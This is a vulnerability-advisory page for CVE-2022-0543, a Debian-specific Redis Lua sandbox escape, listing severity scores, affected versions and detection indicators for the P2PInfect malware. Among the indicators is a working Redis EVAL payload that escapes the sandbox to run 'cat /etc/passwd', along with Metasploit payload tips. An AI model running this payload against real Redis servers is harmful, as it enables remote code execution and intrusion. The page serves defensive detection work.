cbcvebase.
CVE-2022-0543
published 2022-02-18

CVE-2022-0543: It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could…

PriorityP198critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-04-18
Exploited in the wild
EPSS
99.67%
99.9th percentile
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.

Affected

6 ranges
VendorProductVersion rangeFixed in
debianredis< redis 5:6.0.16-2 (bookworm)redis 5:6.0.16-2 (bookworm)
debianredis
redisredis>= 0 < 5:6.0.16-1+deb11u25:6.0.16-1+deb11u2
redisredis>= 0 < 5:6.0.16-25:6.0.16-2
redisredis>= 0 < 5:6.0.16-25:6.0.16-2
redisredis>= 0 < 5:6.0.16-25:6.0.16-2

Detection & IOCsextracted from sources · hover to see the quote

port60100
urlGET /linux
path/dev/tcp
commandeval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/passwd", "r"); local res = f:read("*a"); f:close(); return res' 0
port6380
filenamelinux
filenameminer
filenamewinminer
filenamewindows
  • Monitor for outbound connections from Redis processes to port 60100, which is used by P2PInfect for P2P C2 communication after exploiting CVE-2022-0543.
  • Detect P2PInfect initial payload download by monitoring for plaintext HTTP GET requests to '/linux', '/miner', '/winminer', or '/windows' paths originating from Redis processes.
  • Monitor Redis processes for use of /dev/tcp for outbound network connections, which is a technique used in the P2PInfect exploit payload to connect to C2.
  • Detect P2PInfect MIPS variant propagation by monitoring for SFTP/SCP upload attempts of ELF binaries to SSH servers using weak credentials, and for attempts to install 'redis-server' via the OpenWRT package named 'redis-server'.
  • Hunt for P2PInfect evasion: monitor processes reading '/proc/self/status' for 'TracerPid' checks and system calls disabling Linux core dumps, which are anti-analysis techniques used by the latest P2PInfect variant.
  • The vulnerability only affects Redis on Debian and Ubuntu (and derived) distributions due to a packaging issue; scope detection should focus on these OS families.
  • The Nuclei template for CVE-2022-0543 uses a regex match for 'root:.*:0:0:' in the Redis EVAL response to confirm successful sandbox escape and RCE.
  • ·CVE-2022-0543 is NOT a Redis application vulnerability — it is a Debian/Ubuntu packaging issue with the Lua library. Redis instances on other distributions are not affected.
  • ·Staged Meterpreter payloads will fail on typical Debian/Ubuntu Redis deployments due to the 'MemoryDenyWriteExecute' systemd permission; stageless payloads should be used for testing.
  • ·The Metasploit module only supports x86_64 architecture, though the vulnerability could theoretically be exploited on i386, arm, ppc, etc.

CVSS provenance

nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vulncheck10.0CRITICAL
cisa10.0CRITICAL
vendor_debian10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.